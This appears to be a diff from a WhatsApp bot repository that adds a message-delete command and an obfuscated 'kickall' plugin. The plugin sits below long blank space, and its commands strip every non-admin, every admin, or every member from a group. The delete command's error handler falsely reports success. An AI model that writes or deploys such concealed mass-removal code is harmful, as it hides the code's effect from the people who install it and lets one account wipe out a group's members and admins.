Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
16 |
+
Support : wa.me/18062212660
|
17 |
+
*/
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
|
221 |
+
|
222 |
+
const config = require('../config')
|
223 |
+
const { cmd, commands } = require('../command')
|
224 |
+
|
225 |
+
cmd({
|
226 |
+
pattern: "delete",
|
227 |
+
react: "❌",
|
228 |
+
alias: ["del"],
|
229 |
+
desc: "delete message",
|
230 |
+
category: "group",
|
231 |
+
use: '.del',
|
232 |
+
filename: __filename
|
233 |
+
},
|
234 |
+
async(conn, mek, m,{from, l, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, isItzcp, groupAdmins, isBotAdmins, isAdmins, reply}) => {
|
235 |
+
if (!isOwner || !isAdmins) return;
|
236 |
+
try{
|
237 |
+
if (!m.quoted) return reply(mg.notextfordel);
|
238 |
+
const key = {
|
239 |
+
remoteJid: m.chat,
|
240 |
+
fromMe: false,
|
241 |
+
id: m.quoted.id,
|
242 |
+
participant: m.quoted.sender
|
243 |
+
}
|
244 |
+
await conn.sendMessage(m.chat, { delete: key })
|
245 |
+
} catch(e) {
|
246 |
+
console.log(e);
|
247 |
+
reply('SubZero Delete Successful..👨💻✅')
|
248 |
+
}
|
249 |
+
})
|
plugins/gc-kickall.js
ADDED
@@ -0,0 +1,221 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
|
2 |
+
/*
|
3 |
+
|
4 |
+
$$$$$$\ $$\
|
5 |
+
$$ __$$\ $$ |
|
6 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
7 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
8 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
9 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
10 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
11 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
12 |
+
|
13 |
+
Project Name : SubZero MD
|
14 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
15 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
16 |
+
Support : wa.me/18062212660
|
17 |
+
*/
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
|
221 |
+
const _0x4d9384=_0x124a;(function(_0x4a5a4d,_0x5cc5d4){const _0x2d6d82=_0x124a,_0x31f3a3=_0x4a5a4d();while(!![]){try{const _0x5170e8=-parseInt(_0x2d6d82(0x183))/0x1*(-parseInt(_0x2d6d82(0x173))/0x2)+parseInt(_0x2d6d82(0x171))/0x3*(-parseInt(_0x2d6d82(0x16b))/0x4)+parseInt(_0x2d6d82(0x18c))/0x5*(-parseInt(_0x2d6d82(0x16c))/0x6)+parseInt(_0x2d6d82(0x187))/0x7+parseInt(_0x2d6d82(0x17a))/0x8+parseInt(_0x2d6d82(0x194))/0x9+parseInt(_0x2d6d82(0x16d))/0xa*(parseInt(_0x2d6d82(0x191))/0xb);if(_0x5170e8===_0x5cc5d4)break;else _0x31f3a3['push'](_0x31f3a3['shift']());}catch(_0x522bf0){_0x31f3a3['push'](_0x31f3a3['shift']());}}}(_0x4ae3,0x202b6));function hi(){const _0x5db7f8=_0x124a;console[_0x5db7f8(0x199)]('Hello\x20World!');}function _0x124a(_0x507b09,_0x366e45){const _0x4ae3ab=_0x4ae3();return _0x124a=function(_0x124ad0,_0x11c3e1){_0x124ad0=_0x124ad0-0x168;let _0x42fae3=_0x4ae3ab[_0x124ad0];return _0x42fae3;},_0x124a(_0x507b09,_0x366e45);}hi();const {cmd}=require(_0x4d9384(0x18a)),sleep=_0xecf6c2=>new Promise(_0x3c3251=>setTimeout(_0x3c3251,_0xecf6c2));cmd({'pattern':_0x4d9384(0x16a),'alias':[_0x4d9384(0x175),'endgc',_0x4d9384(0x168)],'desc':_0x4d9384(0x16f),'react':'🎉','category':'group','filename':__filename},async(_0x314de4,_0x2ccb20,_0x194ba0,{from:_0x4ed2fb,groupMetadata:_0x4d975a,groupAdmins:_0x308d5b,isBotAdmins:_0x538199,senderNumber:_0x2f38d5,reply:_0x11bb58,isGroup:_0x4264ae})=>{const _0x5c2c55=_0x4d9384;try{if(!_0x4264ae)return _0x11bb58(_0x5c2c55(0x18b));const _0x175ca3=_0x314de4[_0x5c2c55(0x198)]['id'][_0x5c2c55(0x19d)](':')[0x0];if(_0x2f38d5!==_0x175ca3)return _0x11bb58(_0x5c2c55(0x18d));if(!_0x538199)return _0x11bb58('I\x20need\x20to\x20be\x20an\x20admin\x20to\x20execute\x20this\x20command.');const _0x28cdc9=_0x4d975a['participants'],_0x5e08a5=_0x28cdc9[_0x5c2c55(0x17d)](_0x6914ee=>!_0x308d5b[_0x5c2c55(0x185)](_0x6914ee['id']));if(_0x5e08a5[_0x5c2c55(0x172)]===0x0)return _0x11bb58(_0x5c2c55(0x180));_0x11bb58(_0x5c2c55(0x17c)+_0x5e08a5['length']+_0x5c2c55(0x179));for(let _0x159d74 of _0x5e08a5){try{await _0x314de4['groupParticipantsUpdate'](_0x4ed2fb,[_0x159d74['id']],_0x5c2c55(0x169)),await sleep(0x7d0);}catch(_0x10982b){console['error']('Failed\x20to\x20remove\x20'+_0x159d74['id']+':',_0x10982b);}}_0x11bb58(_0x5c2c55(0x178));}catch(_0x1f1c91){console[_0x5c2c55(0x19b)]('Error\x20removing\x20non-admin\x20users:',_0x1f1c91),_0x11bb58(_0x5c2c55(0x176));}}),cmd({'pattern':_0x4d9384(0x17e),'alias':['kickadmins',_0x4d9384(0x174),'deladmins'],'desc':_0x4d9384(0x19a),'react':'🎉','category':_0x4d9384(0x170),'filename':__filename},async(_0x2e3360,_0x5869eb,_0x466151,{from:_0x250c15,isGroup:_0xa13087,senderNumber:_0xe0b9df,groupMetadata:_0x5142d6,groupAdmins:_0x3065f8,isBotAdmins:_0x3a21e2,reply:_0x54c961})=>{const _0x220a0c=_0x4d9384;try{if(!_0xa13087)return _0x54c961(_0x220a0c(0x18b));const _0x7360c9=_0x2e3360['user']['id']['split'](':')[0x0];if(_0xe0b9df!==_0x7360c9)return _0x54c961(_0x220a0c(0x18d));if(!_0x3a21e2)return _0x54c961(_0x220a0c(0x196));const _0x3ab94c=_0x5142d6[_0x220a0c(0x182)],_0x48f09c=_0x3ab94c[_0x220a0c(0x17d)](_0x2a5176=>_0x3065f8[_0x220a0c(0x185)](_0x2a5176['id'])&&_0x2a5176['id']!==_0x2e3360[_0x220a0c(0x198)]['id']&&_0x2a5176['id']!==_0x7360c9+_0x220a0c(0x197));if(_0x48f09c[_0x220a0c(0x172)]===0x0)return _0x54c961(_0x220a0c(0x16e));_0x54c961('Starting\x20to\x20remove\x20'+_0x48f09c[_0x220a0c(0x172)]+_0x220a0c(0x188));for(let _0x37d81a of _0x48f09c){try{await _0x2e3360['groupParticipantsUpdate'](_0x250c15,[_0x37d81a['id']],_0x220a0c(0x169)),await sleep(0x7d0);}catch(_0x3c0680){console[_0x220a0c(0x19b)](_0x220a0c(0x19c)+_0x37d81a['id']+':',_0x3c0680);}}_0x54c961(_0x220a0c(0x190));}catch(_0x1e4a11){console[_0x220a0c(0x19b)](_0x220a0c(0x17f),_0x1e4a11),_0x54c961(_0x220a0c(0x181));}}),cmd({'pattern':_0x4d9384(0x18e),'alias':[_0x4d9384(0x186),_0x4d9384(0x17b),_0x4d9384(0x193)],'desc':_0x4d9384(0x192),'react':'🎉','category':_0x4d9384(0x170),'filename':__filename},async(_0x283023,_0x52add4,_0x47ad54,{from:_0x585974,isGroup:_0x2b3000,senderNumber:_0x34b349,groupMetadata:_0x3c78e1,isBotAdmins:_0x1f374,reply:_0x237042})=>{const _0x4ab676=_0x4d9384;try{if(!_0x2b3000)return _0x237042(_0x4ab676(0x18b));const _0x26bfae=_0x283023['user']['id'][_0x4ab676(0x19d)](':')[0x0];if(_0x34b349!==_0x26bfae)return _0x237042(_0x4ab676(0x18d));if(!_0x1f374)return _0x237042(_0x4ab676(0x196));const _0x3cf552=_0x3c78e1[_0x4ab676(0x182)];if(_0x3cf552[_0x4ab676(0x172)]===0x0)return _0x237042(_0x4ab676(0x184));const _0x972b0a=_0x3cf552[_0x4ab676(0x17d)](_0x272c30=>_0x272c30['id']!==_0x283023['user']['id']&&_0x272c30['id']!==_0x26bfae+_0x4ab676(0x197));if(_0x972b0a[_0x4ab676(0x172)]===0x0)return _0x237042('No\x20members\x20to\x20remove\x20after\x20excluding\x20the\x20bot\x20and\x20bot\x20owner.');_0x237042(_0x4ab676(0x17c)+_0x972b0a[_0x4ab676(0x172)]+'\x20members,\x20excluding\x20the\x20bot\x20and\x20bot\x20owner...');for(let _0x328ca6 of _0x972b0a){try{await _0x283023[_0x4ab676(0x18f)](_0x585974,[_0x328ca6['id']],_0x4ab676(0x169)),await sleep(0x7d0);}catch(_0x1eeea9){console[_0x4ab676(0x19b)](_0x4ab676(0x19c)+_0x328ca6['id']+':',_0x1eeea9);}}_0x237042(_0x4ab676(0x195));}catch(_0x4178b9){console[_0x4ab676(0x19b)](_0x4ab676(0x189),_0x4178b9),_0x237042(_0x4ab676(0x177));}});function _0x4ae3(){const _0x21f596=['Remove\x20all\x20admin\x20members\x20from\x20the\x20group,\x20excluding\x20the\x20bot\x20and\x20bot\x20owner.','error','Failed\x20to\x20remove\x20','split','endgroup','remove','removemembers','4mgKdcJ','6mdoaNp','20OYOLwg','There\x20are\x20no\x20admin\x20members\x20to\x20remove.','Remove\x20all\x20non-admin\x20members\x20from\x20the\x20group.','group','631212XrPrbt','length','55652AmcpLK','kickall3','kickall','An\x20error\x20occurred\x20while\x20trying\x20to\x20remove\x20non-admin\x20members.\x20Please\x20try\x20again.','An\x20error\x20occurred\x20while\x20trying\x20to\x20remove\x20members.\x20Please\x20try\x20again.','Successfully\x20removed\x20all\x20non-admin\x20members\x20from\x20the\x20group.','\x20non-admin\x20members...','987016meHSNZ','endgc2','Starting\x20to\x20remove\x20','filter','removeadmins','Error\x20removing\x20admins:','There\x20are\x20no\x20non-admin\x20members\x20to\x20remove.','An\x20error\x20occurred\x20while\x20trying\x20to\x20remove\x20admins.\x20Please\x20try\x20again.','participants','4yKVzmq','The\x20group\x20has\x20no\x20members\x20to\x20remove.','includes','kickall2','892367Gyxikh','\x20admin\x20members,\x20excluding\x20the\x20bot\x20and\x20bot\x20owner...','Error\x20removing\x20members:','../command','This\x20command\x20can\x20only\x20be\x20used\x20in\x20groups.','358740xwJxjc','Only\x20the\x20bot\x20owner\x20can\x20use\x20this\x20command.','removeall2','groupParticipantsUpdate','Successfully\x20removed\x20all\x20admin\x20members\x20from\x20the\x20group,\x20excluding\x20the\x20bot\x20and\x20bot\x20owner.','112596tTpnFU','Remove\x20all\x20members\x20and\x20admins\x20from\x20the\x20group,\x20excluding\x20the\x20bot\x20and\x20bot\x20owner.','endgroup2','281556rVUTgS','Successfully\x20removed\x20all\x20members,\x20excluding\x20the\x20bot\x20and\x20bot\x20owner,\x20from\x20the\x20group.','I\x20need\x20to\x20be\x20an\x20admin\x20to\x20execute\x20this\x20command.','@s.whatsapp.net','user','log'];_0x4ae3=function(){return _0x21f596;};return _0x4ae3();}
|
plugins/gc-period.js
ADDED
@@ -0,0 +1,708 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
const config = require("../config");
|
221 |
+
const {
|
222 |
+
cmd,
|
223 |
+
commands
|
224 |
+
} = require("../command");
|
225 |
+
cmd({
|
226 |
+
